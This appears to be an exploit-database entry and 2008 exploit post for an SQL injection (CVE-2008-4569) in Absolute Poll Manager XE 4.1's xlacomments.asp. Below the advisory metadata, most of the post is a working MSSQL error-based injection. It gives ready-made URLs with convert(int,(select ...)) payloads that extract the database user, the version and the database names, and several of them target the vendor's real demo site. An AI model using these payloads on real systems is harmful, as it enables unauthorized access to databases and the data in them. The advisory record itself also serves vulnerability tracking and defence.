 Topic: |
Absolute Poll Manager XE 4.1 (xlacomments.asp) SQL Injection Vuln |
| Credit: |
Hakxer |
| Date: |
2008.10.18 |
| CWE: |
CWE-89 (Show similar)
|
| CVE: |
CVE-2008-4569 (Show details)
Use CVE to see details like:
- CVSS2,
- Affected Software,
- References |
| Risk |
Local |
| Remote |
| Medium |
No |
| Yes |
###############################################################################################
# Author : Hakxer
# Home : Www.educ-up.com
# Type Gap : Sql injection --((MSSQL Injection))--
# script : Absolute Poll Manager XE [see script] http://www.xigla.com/absolutepm/demo.htm
# Greetz : Allah , Egyptian x Hacker , Soufiane , Sinaritx , SQL_inj4ct0r , Stealth , Kof2002
# TM : EgY Coders
#################################################################################################
### POC
www.site.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+user))
### Exploit :
http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+@@version))
http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+user))
http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(1)))
http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(2)))
http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(3)))
###############################################################################
-------------------------------- The End of Gap -----------------------------------
References:
http://www.securityfocus.com/bid/31724
http://www.milw0rm.com/exploits/6731
[ ASCII VERSION ]
|
